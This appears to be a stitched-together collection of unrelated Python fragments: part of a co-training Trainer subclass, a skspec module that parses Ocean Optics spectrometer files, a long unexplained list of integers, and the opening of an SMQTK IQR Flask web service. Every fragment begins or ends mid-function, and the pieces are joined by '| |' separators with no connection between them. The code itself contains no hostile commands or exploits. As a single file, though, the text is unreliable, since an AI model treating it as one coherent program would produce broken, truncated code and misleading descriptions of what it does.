num_training_steps=num_training_steps,
min_lr=self.min_lr)
self.callback_handler.model = self.model
self.callback_handler.optimizer = self.optimizer
self.callback_handler.lr_scheduler = self.lr_scheduler
self.control = self.callback_handler.on_train_begin(self.args, self.state, self.control)
self._total_loss_scalar = 0.0
self._globalstep_last_logged = self.state.global_step
def post_epoch(self, step, epoch, tr_loss):
"""
Collection of all the callback functions called
after the epoch is done. See ~transformers.Trainer.train() for more details.
Args:
step (:obj:`int`): step number, number of steps passed out of
num_training_steps used in pre_train_init method.
epoch (:obj:`int`): epoch passed.
tr_loss(:obj:`float`): training loss.
"""
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args.max_grad_norm)
self.optimizer.step()
self.lr_scheduler.step()
self.model.zero_grad()
self.state.global_step += 1
self.state.epoch = self.global_epoch + epoch + (step + 1) / self.steps_in_epoch
self.control = self.callback_handler.on_step_end(self.args, self.state, self.control)
self._maybe_log_save_evaluate(tr_loss, self.model, trial=None, epoch=epoch)
def equate_lengths(self, model1_train, model2_train):
"""
A method useful for CoTrain, TriTrain model training. It finds
whichever model dataset has less training examples and then
equates them using SimpleDataset.extend_length method
Args:
model1_train (:obj:`SimpleDataset`): Training dataset for model 1.
model2_train (:obj:`SimpleDataset`): Training dataset for model 2.
"""
if len(model1_train) > len(model2_train):
model2_train.extend_length(len(model1_train))
elif len(model2_train) > len(model1_train):
model1_train.extend_length(len(model2_train))
def confi_prediction(self, logits_m1, logits_m2, logits_m3=None):
"""
Prediction made based on between confidence of the models. First
checks whichever model has the highest probability (confidence)
on a given example and choses that class as the final answer.
Args:
logits_m1 (:obj:`torch.FloatTensor`): logits recieved from model 1.
logits_m2 (:obj:`torch.FloatTensor`): logits from model 2.
logits_m3 (:obj:`torch.FloatTensor`): logits from model 3.
"""
p_label1, labels1 = torch.max(logits_m1, 1)
p_label2, labels2 = torch.max(logits_m2, 1)
logits_out = torch.zeros(logits_m1.size(), device=logits_m1.device)
if logits_m3 is None:
m1_confi = p_label1 >= p_label2
m2_confi = p_label2 >= p_label1
else:
p_label3, labels3 = torch.max(logits_m3, 1)
m1_confi = torch.logical_and(p_label1 >= p_label2, p_label1 >= p_label3)
m2_confi = torch.logical_and(p_label2 >= p_label1, p_label2 >= p_label3)
m3_confi = torch.logical_and(p_label3 >= p_label1, p_label3 >= p_label2)
logits_out[m3_confi, :] = logits_m3[m3_confi, :]
logits_out[m1_confi, :] = logits_m1[m1_confi, :]
logits_out[m2_confi, :] = logits_m2[m2_confi, :]
return logits_out
def prediction_step(
self,
model,
inputs,
prediction_loss_only,
ignore_keys=None,
):
"""
Slightly changed ~transformers.Trainer.prediction_step using
confi_prediction method to find prediction of Cotrain and TriTrain Models.
| |
<filename>skspec/IO/gwu_interfaces.py
''' Utilities for converting various file formats to a skspec TimeSpectra.
To convert a list of raw files, use from_spec_files()
To convert old-style timefile/spectral data file, use from_timefile_datafile()
To convert spectral datafiles from Ocean Optics USB2000 and USB650, pas file list in
from_spec_files.
Returns a skspec TimeSpectra with custom attributes "metadata", "filedict", "baseline".
'''
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2012, GWU Physics"
__license__ = "Free BSD"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
import os
# 3RD Party Imports
from pandas import DataFrame, Series, datetime, read_csv, concat
import numpy as np
# skspec imports
from skspec.core.timespectra import TimeSpectra
from skspec.core.specindex import SpecIndex
from skspec.core.file_utils import get_files_in_dir, get_shortname
import logging
logger = logging.getLogger(__name__)
### Verified OCean Optics month naming conventions (Actually it capitalizes but this call with month.lower() ###
spec_suite_months={'jan':1,
'feb':2,
'mar':3,
'apr':4,
'may':5,
'jun':6,
'jul':7,
'aug':8,
'sep':9,
'oct':10,
'nov':11,
'dec':12}
spec_dtype = np.dtype([ ('wavelength', float), ('intensity', float) ])
def get_shortname(filepath, cut_extension=False):
''' simply get the filename of fullpath. Cut extension will remove file extension'''
shortname = os.path.basename(filepath)
if cut_extension:
shortname = os.path.splitext(shortname)[0]
return shortname
### Following two functions are utilized by both data interfacing functions. ###
def extract_darkfile(filelist, return_null=True):
''' Attempts to pick out a dark file from a list using string matching. Handling of darkfile
is done by other functions. Opted to raise errors and warnings here, instead of downstream.
If return_null: it will return none if no dark file is found. Otherwise it will raise an error.'''
darkfiles=[]
for infile in filelist:
if "dark" in infile.lower() or "drk" in infile.lower():
darkfiles.append(infile)
### If not darkfiles found, return null or raise ###
if len(darkfiles)==0:
if return_null:
return None
else:
raise Warning("WARNING: Darkfile not found in filelist: \
startfile %s - endfile %s"%(filelist[0], filelist[-1]))
### If multiple darkfiles found, RAISE a warning ###
elif len(darkfiles)>1:
raise Warning("Multiple darkfiles founds in filelist: \
startfile %s - endfile %s"%(filelist[0], filelist[-1]))
else:
return darkfiles[0]
def get_headermetadata_dataframe(dataframe, time_file_dict, name=''):
''' After creation of the dataframe and datetime-to-file dic, various metadata attributes
come together like filecount, filestart, filend etc...
**run title becomes name of dataframe and can be adopted by plots'''
filecount=len(dataframe.columns)
timestart, timeend=dataframe.columns[0], dataframe.columns[-1]
filestart, fileend=time_file_dict[timestart], time_file_dict[timeend]
specstart, specend=dataframe.index[0], dataframe.index[-1]
return {'filecount':filecount,
'timestart':timestart,
'timeend':timeend,
'filestart':filestart,
'fileend':fileend,
'specstart':specstart,
'specend':specend}
##########################################################
### Below are the 2 main functions to extract the data ###
##########################################################
def from_spec_files(file_list, name='', skiphead=17, skipfoot=1, check_for_overlapping_time=True, extract_dark=True):
''' Takes in raw files directly from Ocean optics USB2000 and USB650 spectrometers and returns a
skspec TimeSpectra. If spectral data stored without header, can be called with skiphead=0.
Parameters
----------
name: Set name of returned TimeSpectra.
check_for_overlapping_time: will raise errors if any files have identical times. Otherwise, time
is overwritten. Really only useful for testing or otherwise cornercase instances.
extract_dark: Attempt to find a filename with caseinsenstive string match to "dark". If dark spectrum
not found, will print warning. If multiple darks found, will raise error.
skiphead/skipfoot: Mostly for reminder that this filetype has a 17 line header and a 1 line footer.
Notes
-----
Built to work with 2-column data only!!!
Dataframe is constructed from a list of dictionaries.
Each dataframe gets an appended headerdata attribute (dataframe.headerdata) which is a dictionary,
keyed by columns and stores (infile, header, footer) data so no info is lost between files.
Constructed to work for non-equally spaced datafiles, or non-identical data (aka wavelengths can have nans).
'''
dict_of_series={} #Dict of series eventually merged to dataframe
time_file_dict={} #Dict of time:filename (darkfile intentionally excluded)
_overlap_count = 0 # Tracks if overlapping occurs
### If looking for a darkfile, this will find it. Bit redundant but I'm lazy..###
if extract_dark:
darkfile=extract_darkfile(file_list, return_null=True)
if darkfile:
with open(darkfile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
wavedata=np.genfromtxt(darkfile, dtype=spec_dtype, skip_header=skiphead, skip_footer=skipfoot)
darktime=_get_datetime_specsuite(header)
baseline=Series(wavedata['intensity'], index=wavedata['wavelength'], name=darkfile)
file_list.remove(darkfile)
f.close()
else:
baseline=None
file_list = [f for f in file_list
if os.path.basename(f) != '.gitignore']
for infile in file_list:
###Read in only the header lines, not all the lines of the file
###Strips and splits in one go
with open(infile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
#Store wavelength, intensity data in a 2-column datatime for easy itemlookup
#Eg wavedata['wavelength']
wavedata=np.genfromtxt(infile, dtype=spec_dtype, skip_header=skiphead, skip_footer=skipfoot)
# Extract time data from header
datetime=_get_datetime_specsuite(header)
if datetime in time_file_dict:
_overlap_count += 1
# Make sure timepoints aren't overlapping with any others
if check_for_overlapping_time and _overlap_count:
raise IOError('Duplicate time %s found in between files %s, %s.'
' To overwrite, set check_for_overlapping_time = False.'
%( datetime, infile, time_file_dict[datetime] ))
time_file_dict[datetime]=infile
dict_of_series[datetime]=Series(wavedata['intensity'], index=wavedata['wavelength'])
f.close()
# Make timespec, add filenames, baseline and metadata attributes (note, DateTimeIndex auto sorts!!)
df = DataFrame(dict_of_series) #Dataframe beacuse TS doesn't handle dict of series
print df.columns
timespec = TimeSpectra(df, name=name)
timespec.specunit = 'nm'
timespec.filedict = time_file_dict
timespec.baseline = baseline #KEEP THIS AS DARK SERIES RECALL IT IS SEPARATE FROM reference OR REFERENCE..
# Take metadata from first file in filelist that isn't darkfile
for infile in file_list:
if infile != darkfile:
with open(infile) as f:
header=[f.next().strip() for x in xrange(skiphead)]
meta_partial=_get_metadata_fromheader(header)
break
meta_general=get_headermetadata_dataframe(timespec, time_file_dict)
meta_general.update(meta_partial)
timespec.metadata=meta_general
if _overlap_count:
logger.warn('Time duplication found in %s of %s files. Duplicates were '
'removed!' % (_overlap_count, len(file_list)))
return timespec
def _get_datetime_specsuite(specsuiteheader):
''' Special, Ocean-optics specific function to get date information from a their customized header.'''
dateline=specsuiteheader[2].split()
year, month, day=int(dateline[6]), dateline[2], int(dateline[3])
month=spec_suite_months[month.lower()]
hrs, mins, secs=dateline[4].split(':')
hrs=int(hrs) ; mins=int(mins) ; secs=int(secs)
return datetime(year, month, day, hrs, mins, secs)
def _get_metadata_fromheader(specsuiteheader):
''' Populates metadata attributes from the speactrasuite datafile header'''
sh=specsuiteheader #for ease in calling
return {'dark_spec_pres':sh[4].split()[3], 'spectrometer':sh[7].split()[1],
'int_unit':sh[8].split()[2], 'int_time':int(sh[8].split()[3]),
'spec_avg':int(sh[9].split()[2]), 'boxcar':int(sh[10].split()[2]),
'ref_spec_pres':sh[5].split()[3], 'electric_dark_correct':sh[11].split()[4],
'strobe_lamp':sh[12].split()[2],'detector_nonlin_correct':sh[13].split()[4],
'stray_light_correct':sh[14].split()[4], 'pix_in_spec':int(sh[15].split()[6])}
######### Get dataframe from timefile / datafile #####
# Authors <NAME>/<NAME>, 10/15/12
def from_timefile_datafile(datafile, timefile, extract_dark=True, name=''):
''' Converts old-style spectral data from GWU phys lab into
a dataframe with timestamp column index and wavelength row indicies.
Creates the DataFrame from a dictionary of Series, keyed by datetime.
**name becomes name of dataframe'''
tlines=open(timefile,'r').readlines()
tlines=[line.strip().split() for line in tlines]
tlines.pop(0)
time_file_dict=dict((_get_datetime_timefile(tline),tline[0]) for tline in tlines)
### Read in data matrix, separate first row (wavelengths) from the rest of the data
wavedata=np.genfromtxt(datafile, dtype='float', skip_header=1)
data, wavelengths=wavedata[:,1::], wavedata[:,0] #Separate wavelength column
### Sort datetimes here before assigning/removing dark spec etc...
sorted_tfd=sorted(time_file_dict.items())
sorted_times, sorted_files=zip(*( (((i[0]), (i[1])) for i in sorted_tfd)))
### Seek darkfile. If found, take it out of dataframe. ###
if extract_dark:
darkfile=extract_darkfile(sorted_files, return_null=True)
if darkfile:
####Find baseline by reverse lookup (lookup by value) and get index position
#darkindex, darktime=[(idx, time) for idx, (time, afile) in enumerate(sorted_tfd) if afile == darkfile][0]
darkindex=sorted_files.index(darkfile)
darktime=sorted_times[darkindex]
baseline=Series(data[:,darkindex], index=wavelengths, name=darkfile)
del time_file_dict[darktime] #Intentionally remove
sorted_times=list(sorted_times) #Need to do in two steps
sorted_times.remove(darktime)
data=np.delete(data, darkindex, 1) #Delete dark column from numpy data
else:
baseline=None
dataframe=TimeSpectra(data, columns=sorted_times, index=wavelengths)
### Add field attributes to dataframe
dataframe.baseline=baseline
dataframe.filedict=time_file_dict
if name:
dataframe.name=name
### Get headermeta data from first line in timefile that isn't darkfile. Only checks one line
### Does not check for consistency
for line in tlines:
if line[0]==darkfile:
pass
else:
meta_partial=_get_headermetadata_timefile(line[0]) #DOUBLE CHECK THIS WORKS
break
### Extract remaining metadata (file/time info) and return ###
meta_general=get_headermetadata_dataframe(dataframe, time_file_dict)
meta_general.update(meta_partial)
dataframe.metadata=meta_general
dataframe.specunit='nm' #This autodetected in plots
### Sort dataframe by ascending time (could also sort spectral data) ###
dataframe.sort(axis=1, inplace=True) #axis1=columns
return dataframe
def from_gwu_chem_UVVIS(filelist, sortnames=False, shortname=True, cut_extension=False, name=''):
''' Format for comma delimited two column data from GWU chemistry's UVVis. These have no useful metadata
or dark data and so it is important that users either pass in a correctly sorted filelist. Once the
dataframe is created, on can do df=df.reindex(columns=[correct order]).
It uses read_csv() to and creates a list of dataframes. Afterwards, concat() merges these.
Kwds:
sortnames- Will attempt to autosort the filelist. Otherwise, order of files passed in is
directly used as columns.
shortname- | |
22197,
22198,
22200,
22201,
22202,
22203,
22204,
22205,
22206,
22207,
22208,
22209,
22212,
22214,
22216,
22217,
22218,
22219,
22220,
22221,
22222,
22223,
22224,
22225,
22226,
22227,
22228,
22229,
22231,
22232,
22234,
22235,
22236,
22237,
22238,
22239,
22240,
22241,
22242,
22243,
22244,
22245,
22246,
22247,
22248,
22249,
22250,
22251,
22252,
22253,
22254,
22255,
22256,
22257,
22259,
22260,
22261,
22262,
22263,
22264,
22265,
22266,
22267,
22268,
22269,
22270,
22271,
22272,
22274,
22275,
22276,
22277,
22278,
22279,
22280,
22281,
22282,
22283,
22284,
22285,
22286,
22287,
22288,
22289,
22290,
22291,
22292,
22293,
22294,
22295,
22296,
22297,
22298,
22299,
22300,
22301,
22302,
22303,
22304,
22305,
22306,
22307,
22308,
22309,
22310,
22311,
22312,
22313,
22314,
22315,
22317,
22318,
22319,
22320,
22321,
22322,
22324,
22325,
22326,
22327,
22328,
22329,
22330,
22331,
22332,
22333,
22334,
22335,
22336,
22337,
22338,
22339,
22340,
22342,
22343,
22344,
22345,
22347,
22348,
22349,
22350,
22351,
22352,
22353,
22354,
22355,
22356,
22357,
22358,
22359,
22360,
22361,
22362,
22363,
22364,
22365,
22366,
22367,
22368,
22369,
22370,
22371,
22372,
22373,
22374,
22375,
22376,
22377,
22378,
22379,
22380,
22381,
22382,
22383,
22384,
22385,
22388,
22389,
22390,
22392,
22393,
22394,
22395,
22396,
22397,
22398,
22399,
22400,
22401,
22402,
22403,
22404,
22405,
22406,
22407,
22408,
22409,
22410,
22411,
22412,
22413,
22414,
22416,
22417,
22418,
22419,
22420,
22421,
22422,
22423,
22424,
22425,
22426,
22427,
22428,
22429,
22430,
22431,
22432,
22433,
22434,
22435,
22436,
22437,
22438,
22439,
22440,
22441,
22442,
22443,
22444,
22445,
22446,
22447,
22448,
22449,
22450,
22451,
22452,
22456,
22457,
22458,
22459,
22460,
22461,
22462,
22463,
22464,
22465,
22466,
22467,
22468,
22469,
22470,
22471,
22472,
22473,
22476,
22477,
22478,
22479,
22480,
22481,
22482,
22483,
22484,
22487,
22488,
22489,
22490,
22491,
22492,
22493,
22494,
22495,
22496,
22497,
22498,
22499,
22500,
22501,
22502,
22503,
22504,
22505,
22506,
22507,
22508,
22509,
22510,
22511,
22512,
22513,
22514,
22515,
22516,
22517,
22518,
22519,
22520,
22521,
22522,
22523,
22524,
22525,
22526,
22527,
22528,
22529,
22530,
22531,
22532,
22533,
22534,
22535,
22536,
22537,
22538,
22539,
22540,
22541,
22542,
22543,
22544,
22545,
22547,
22548,
22549,
22550,
22551,
22552,
22553,
22554,
22555,
22556,
22557,
22558,
22559,
22560,
22561,
22562,
22563,
22565,
22566,
22567,
22568,
22570,
22571,
22572,
22573,
22574,
22575,
22576,
22577,
22578,
22579,
22580,
22583,
22589,
22590,
22591,
22592,
22593,
22594,
22595,
22597,
22598,
22599,
22600,
22601,
22602,
22603,
22604,
22605,
22606,
22607,
22608,
22609,
22610,
22611,
22612,
22613,
22614,
22615,
22616,
22617,
22618,
22620,
22621,
22622,
22623,
22624,
22627,
22628,
22629,
22630,
22631,
22632,
22633,
22634,
22635,
22636,
22637,
22638,
22639,
22640,
22641,
22642,
22644,
22645,
22646,
22647,
22648,
22649,
22650,
22651,
22652,
22653,
22654,
22655,
22656,
22657,
22658,
22659,
22660,
22661,
22662,
22663,
22664,
22665,
22666,
22667,
22668,
22669,
22670,
22671,
22672,
22673,
22674,
22675,
22676,
22677,
22678,
22679,
22680,
22681,
22682,
22683,
22688,
22689,
22690,
22691,
22693,
22699,
22700,
22701,
22702,
22706,
22707,
22708,
22710,
22711,
22712,
22713,
22714,
22715,
22716,
22717,
22718,
22719,
22720,
22721,
22722,
22723,
22725,
22726,
22727,
22728,
22729,
22730,
22731,
22732,
22733,
22734,
22735,
22736,
22737,
22739,
22740,
22741,
22742,
22743,
22744,
22745,
22746,
22747,
22748,
22749,
22750,
22752,
22753,
22754,
22755,
22756,
22757,
22758,
22759,
22760,
22761,
22762,
22763,
22764,
22766,
22767,
22768,
22769,
22770,
22771,
22772,
22773,
22774,
22775,
22776,
22777,
22778,
22779,
22783,
22784,
22785,
22786,
22787,
22788,
22789,
22790,
22791,
22792,
22793,
22794,
22795,
22796,
22797,
22798,
22799,
22800,
22801,
22802,
22803,
22804,
22806,
22807,
22808,
22809,
22810,
22811,
22812,
22813,
22815,
22816,
22818,
22819,
22820,
22821,
22822,
22823,
22824,
22825,
22826,
22827,
22828,
22829,
22830,
22831,
22832,
22833,
22834,
22835,
22836,
22837,
22838,
22839,
22840,
22841,
22842,
22843,
22844,
22845,
22846,
22847,
22848,
22849,
22850,
22851,
22852,
22853,
22854,
22855,
22856,
22857,
22858,
22859,
22860,
22861,
22862,
22863,
22864,
22865,
22866,
22867,
22868,
22869,
22870,
22871,
22872,
22873,
22874,
22875,
22876,
22877,
22878,
22879,
22880,
22881,
22882,
22883,
22884,
22885,
22886,
22887,
22888,
22889,
22890,
22891,
22892,
22893,
22894,
22895,
22896,
22897,
22900,
22901,
22902,
22903,
22904,
22905,
22906,
22907,
22908,
22909,
22910,
22911,
22912,
22913,
22914,
22915,
22916,
22917,
22918,
22919,
22920,
22921,
22922,
22923,
22924,
22925,
22926,
22927,
22930,
22932,
22934,
22935,
22936,
22937,
22938,
22939,
22940,
22941,
22942,
22943,
22944,
22945,
22946,
22947,
22948,
22949,
22950,
22951,
22952,
22953,
22954,
22955,
22956,
22957,
22958,
22959,
22960,
22961,
22962,
22963,
22964,
22965,
22966,
22967,
22968,
22969,
22970,
22971,
22972,
22973,
22974,
22975,
22976,
22977,
22978,
22979,
22980,
22981,
22982,
22983,
22984,
22985,
22986,
22987,
22988,
22990,
22991,
22992,
22993,
22994,
22995,
22996,
22997,
22998,
22999,
23000,
23001,
23002,
23003,
23004,
23005,
23006,
23007,
23008,
23009,
23010,
23011,
23012,
23013,
23014,
23015,
23016,
23017,
23018,
23019,
23020,
23021,
23022,
23023,
23024,
23025,
23027,
23028,
23029,
23030,
23031,
23032,
23033,
23035,
23036,
23037,
23038,
23039,
23040,
23041,
23042,
23043,
23044,
23045,
23046,
23047,
23048,
23049,
23050,
23051,
23053,
23054,
23055,
23056,
23057,
23059,
23060,
23061,
23062,
23063,
23064,
23065,
23066,
23067,
23068,
23069,
23070,
23071,
23072,
23073,
23075,
23077,
23078,
23079,
23081,
23082,
23083,
23084,
23085,
23087,
23088,
23089,
23090,
23091,
23092,
23093,
23094,
23095,
23096,
23097,
23098,
23099,
23100,
23101,
23103,
23104,
23105,
23106,
23107,
23108,
23109,
23110,
23111,
23112,
23113,
23114,
23115,
23116,
23117,
23118,
23119,
23120,
23121,
23122,
23123,
23124,
23125,
23126,
23127,
23128,
23129,
23130,
23131,
23132,
23133,
23134,
23135,
23136,
23137,
23138,
23139,
23140,
23141,
23142,
23143,
23144,
23145,
23146,
23147,
23148,
23149,
23150,
23151,
23152,
23153,
23154,
23155,
23156,
23160,
23161,
23165,
23166,
23167,
23168,
23169,
23170,
23171,
23173,
23177,
23178,
23179,
23180,
23181,
23182,
23183,
23184,
23191,
23192,
23194,
23195,
23196,
23197,
23198,
23199,
23200,
23201,
23203,
23205,
23206,
23207,
23211,
23217,
23218,
23219,
23220,
23221,
23226,
23228,
23237,
23238,
23239,
23242,
23243,
23244,
23246,
23247,
23248,
23249,
23250,
23251,
23252,
23253,
23254,
23255,
23256,
23257,
23258,
23259,
23260,
23261,
23262,
23263,
23264,
23265,
23266,
23267,
23268,
23269,
23270,
23272,
23273,
23274,
23275,
23276,
23277,
23278,
23279,
23280,
23281,
23282,
23283,
23284,
23285,
23286,
23287,
23288,
23289,
23290,
23291,
23292,
23293,
23294,
23295,
23296,
23297,
23298,
23299,
23300,
23301,
23302,
23303,
23304,
23305,
23306,
23307,
23308,
23309,
23310,
23311,
23312,
23313,
23314,
23315,
23316,
23317,
23318,
23319,
23320,
23321,
23322,
23323,
23324,
23326,
23327,
23329,
23331,
23332,
23333,
23334,
23336,
23337,
23338,
23339,
23343,
23344,
23345,
23346,
23347,
23348,
23353,
23354,
23355,
23358,
23361,
23364,
23366,
23367,
23370,
23371,
23372,
23373,
23375,
23376,
23377,
23379,
23380,
23381,
23383,
23384,
23385,
23386,
23387,
23389,
23390,
23391,
23392,
23393,
23394,
23395,
23396,
23397,
23398,
23399,
23400,
23401,
23402,
23403,
23404,
23405,
23406,
23407,
23408,
23409,
23410,
23411,
23412,
23413,
23414,
23415,
23417,
23423,
23424,
23425,
23426,
23427,
23429,
23430,
23431,
23435,
23436,
23437,
23438,
23439,
23440,
23441,
23442,
23444,
23445,
23446,
23447,
23448,
23449,
23451,
23452,
23453,
23454,
23455,
23456,
23458,
23459,
23461,
23462,
23464,
23465,
23466,
23467,
23468,
23469,
23473,
23474,
23475,
23476,
23477,
23478,
23479,
23480,
23482,
23483,
23484,
23485,
23486,
23487,
23488,
23489,
23490,
23491,
23492,
23493,
23494,
23495,
23497,
23498,
23499,
23500,
23501,
23502,
23503,
23504,
23505,
23506,
23507,
23508,
23509,
23510,
23511,
23512,
23513,
23514,
23515,
23516,
23517,
23518,
23519,
23520,
23521,
23522,
23523,
23524,
23525,
23526,
23527,
23528,
23529,
23530,
23531,
23532,
23533,
23534,
23535,
23536,
23537,
23538,
23539,
23540,
23541,
23542,
23543,
23544,
23545,
23546,
23547,
23548,
23549,
23550,
23551,
23552,
23553,
23554,
23555,
23556,
23557,
23558,
23559,
23560,
23561,
23562,
23563,
23564,
23565,
23566,
23568,
23569,
23570,
23571,
23572,
23573,
23574,
23575,
23576,
23577,
23578,
23579,
23580,
23584,
23585,
23586,
23587,
23588,
23589,
23590,
23591,
23592,
23593,
23594,
23595,
23596,
23597,
23598,
23599,
23600,
23601,
23602,
23603,
23604,
23605,
23606,
23607,
23608,
23609,
23610,
23611,
23612,
23613,
23614,
23615,
23617,
23618,
23619,
23620,
23621,
23622,
23623,
23624,
23625,
23626,
23627,
23628,
23629,
23630,
23631,
23632,
23633,
23634,
23635,
23636,
23637,
23638,
23639,
23642,
23643,
23644,
23645,
23646,
23654,
23657,
23658,
23659,
| |
<filename>python/smqtk/web/iqr_service/iqr_server.py
import base64
import binascii
import collections
import json
import multiprocessing
import time
import traceback
import uuid
import flask
# import smqtk.algorithms
from smqtk.algorithms import (
get_classifier_impls,
get_descriptor_generator_impls,
get_nn_index_impls,
get_relevancy_index_impls,
SupervisedClassifier,
)
from smqtk.iqr import (
iqr_controller,
iqr_session,
)
from smqtk.representation import (
ClassificationElementFactory,
DescriptorElementFactory,
get_descriptor_index_impls,
)
from smqtk.representation.data_element.memory_element import DataMemoryElement
from smqtk.utils import (
merge_dict,
plugin,
)
from smqtk.web import SmqtkWebApp
def new_uuid():
return str(uuid.uuid1(clock_seq=int(time.time() * 1000000)))\
.replace('-', '')
def make_response_json(message, **params):
r = {
"message": message,
"time": {
"unix": time.time(),
"utc": time.asctime(time.gmtime()),
}
}
merge_dict(r, params)
return flask.jsonify(**r)
# Get expected JSON decode exception.
#
# Flask can use one of two potential JSON parsing libraries: simplejson or
# json. simplejson has a specific exception for decoding errors while json
# just raises a ValueError.
#
# noinspection PyProtectedMember
if hasattr(flask.json._json, 'JSONDecodeError'):
# noinspection PyProtectedMember
JSON_DECODE_EXCEPTION = getattr(flask.json._json, 'JSONDecodeError')
else:
JSON_DECODE_EXCEPTION = ValueError
def parse_hashable_json_list(json_str):
"""
Parse and check input string, looking for a JSON list of hashable values.
:param json_str: String to parse and check.
:type json_str: str
:raises ValueError: Expected value check failed.
:return: List of hashable-type values.
:rtype: list[collections.Hashable]
"""
try:
v_list = flask.json.loads(json_str)
except JSON_DECODE_EXCEPTION as ex:
raise ValueError("JSON parsing error: %s" % str(ex))
if not isinstance(v_list, list):
raise ValueError("JSON provided is not a list.")
# Should not be an empty list.
elif not v_list:
raise ValueError("JSON list is empty.")
# Contents of list should be numeric or string values.
elif not all(isinstance(el, collections.Hashable)
for el in v_list):
raise ValueError("Not all JSON list parts were hashable values.")
return v_list
class IqrService (SmqtkWebApp):
"""
Configuration Notes
-------------------
``descriptor_index`` will currently be configured twice: once for the
global index and once for the nearest neighbors index. These will probably
be the set to the same index. In more detail, the global descriptor index
is used when the "refine" endpoint is given descriptor UUIDs
"""
@classmethod
def is_usable(cls):
return True
@classmethod
def get_default_config(cls):
c = super(IqrService, cls).get_default_config()
c_rel_index = plugin.make_config(
get_relevancy_index_impls()
)
merge_dict(c_rel_index, iqr_session.DFLT_REL_INDEX_CONFIG)
merge_dict(c, {
"iqr_service": {
"session_control": {
"positive_seed_neighbors": 500,
"session_expiration": {
"enabled": False,
"check_interval_seconds": 30,
"session_timeout": 3600,
}
},
"plugin_notes": {
"relevancy_index_config":
"The relevancy index config provided should not have "
"persistent storage configured as it will be used in "
"such a way that instances are created, built and "
"destroyed often.",
"descriptor_factory":
"What descriptor element factory to use when asked to "
"compute a descriptor on data.",
"descriptor_generator":
"Descriptor generation algorithm to use when "
"requested to describe data.",
"descriptor_index":
"This is the index from which given positive and "
"negative example descriptors are retrieved from. "
"Not used for nearest neighbor querying. "
"This index must contain all descriptors that could "
"possibly be used as positive/negative examples and "
"updated accordingly.",
"neighbor_index":
"This is the neighbor index to pull initial near-"
"positive descriptors from.",
"classifier_config":
"The configuration to use for training and using "
"classifiers for the /classifier endpoint. "
"When configuring a classifier for use, don't fill "
"out model persistence values as many classifiers "
"may be created and thrown away during this service's "
"operation.",
"classification_factory":
"Selection of the backend in which classifications "
"are stored. The in-memory version is recommended "
"because normal caching mechanisms will not account "
"for the variety of classifiers that can potentially "
"be created via this utility.",
},
"plugins": {
"relevancy_index_config": c_rel_index,
"descriptor_factory":
DescriptorElementFactory.get_default_config(),
"descriptor_generator": plugin.make_config(
get_descriptor_generator_impls()
),
"descriptor_index": plugin.make_config(
get_descriptor_index_impls()
),
"neighbor_index":
plugin.make_config(get_nn_index_impls()),
"classifier_config":
plugin.make_config(get_classifier_impls()),
"classification_factory":
ClassificationElementFactory.get_default_config(),
},
}
})
return c
def __init__(self, json_config):
super(IqrService, self).__init__(json_config)
sc_config = json_config['iqr_service']['session_control']
# Initialize from config
self.positive_seed_neighbors = sc_config['positive_seed_neighbors']
self.classifier_config = \
json_config['iqr_service']['plugins']['classifier_config']
self.classification_factory = \
ClassificationElementFactory.from_config(
json_config['iqr_service']['plugins']['classification_factory']
)
self.descriptor_factory = DescriptorElementFactory.from_config(
json_config['iqr_service']['plugins']['descriptor_factory']
)
#: :type: smqtk.algorithms.DescriptorGenerator
self.descriptor_generator = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['descriptor_generator'],
get_descriptor_generator_impls(),
)
#: :type: smqtk.representation.DescriptorIndex
self.descriptor_index = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['descriptor_index'],
get_descriptor_index_impls(),
)
#: :type: smqtk.algorithms.NearestNeighborsIndex
self.neighbor_index = plugin.from_plugin_config(
json_config['iqr_service']['plugins']['neighbor_index'],
get_nn_index_impls(),
)
self.neighbor_index_lock = multiprocessing.RLock()
self.rel_index_config = \
json_config['iqr_service']['plugins']['relevancy_index_config']
# Record of trained classifiers for a session. Session classifier
# modifications locked under the parent session's global lock.
#: :type: dict[collections.Hashable, SupervisedClassifier | None]
self.session_classifiers = {}
# Control for knowing when a new classifier should be trained for a
# session (True == train new classifier). Modification for specific
# sessions under parent session's lock.
#: :type: dict[collections.Hashable, bool]
self.session_classifier_dirty = {}
def session_expire_callback(session):
"""
:type session: smqtk.iqr.IqrSession
"""
with session:
self._log.debug("Removing session %s classifier", session.uuid)
del self.session_classifiers[session.uuid]
del self.session_classifier_dirty[session.uuid]
self.controller = iqr_controller.IqrController(
sc_config['session_expiration']['enabled'],
sc_config['session_expiration']['check_interval_seconds'],
session_expire_callback
)
self.session_timeout = \
sc_config['session_expiration']['session_timeout']
self.add_routes()
def add_routes(self):
"""
Setup Flask URL rules.
"""
self.add_url_rule('/is_ready',
view_func=self.is_ready,
methods=['GET'])
self.add_url_rule('/add_descriptor_from_data',
view_func=self.add_descriptor_from_data,
methods=['POST'])
# TODO: Potentially other add_descriptor_from_* variants that expect
# other forms of input besides base64, like arbitrary URIs (to
# use from_uri factory function).
self.add_url_rule('/nn_index',
view_func=self.get_nn_index_status,
methods=['GET'])
self.add_url_rule('/nn_index',
view_func=self.update_nn_index,
methods=['POST'])
self.add_url_rule('/nn_index',
view_func=self.remove_from_nn_index,
methods=['DELETE'])
self.add_url_rule('/data_nearest_neighbors',
view_func=self.data_nearest_neighbors,
methods=['POST'])
self.add_url_rule('/uid_nearest_neighbors',
view_func=self.uid_nearest_neighbors,
methods=['POST'])
self.add_url_rule('/session_ids',
view_func=self.get_sessions_ids,
methods=['GET'])
self.add_url_rule('/session',
view_func=self.get_session_info,
methods=['GET'])
self.add_url_rule('/session',
view_func=self.init_session,
methods=['POST'])
self.add_url_rule('/session',
view_func=self.reset_session,
methods=['PUT'])
self.add_url_rule('/session',
view_func=self.clean_session,
methods=['DELETE'])
self.add_url_rule('/add_external_pos',
view_func=self.add_external_positive,
methods=['POST'])
self.add_url_rule('/add_external_neg',
view_func=self.add_external_negative,
methods=['POST'])
self.add_url_rule('/adjudicate',
view_func=self.get_adjudication,
methods=['GET'])
self.add_url_rule('/adjudicate',
view_func=self.adjudicate,
methods=['POST'])
self.add_url_rule('/initialize',
view_func=self.initialize,
methods=['POST'])
self.add_url_rule('/refine',
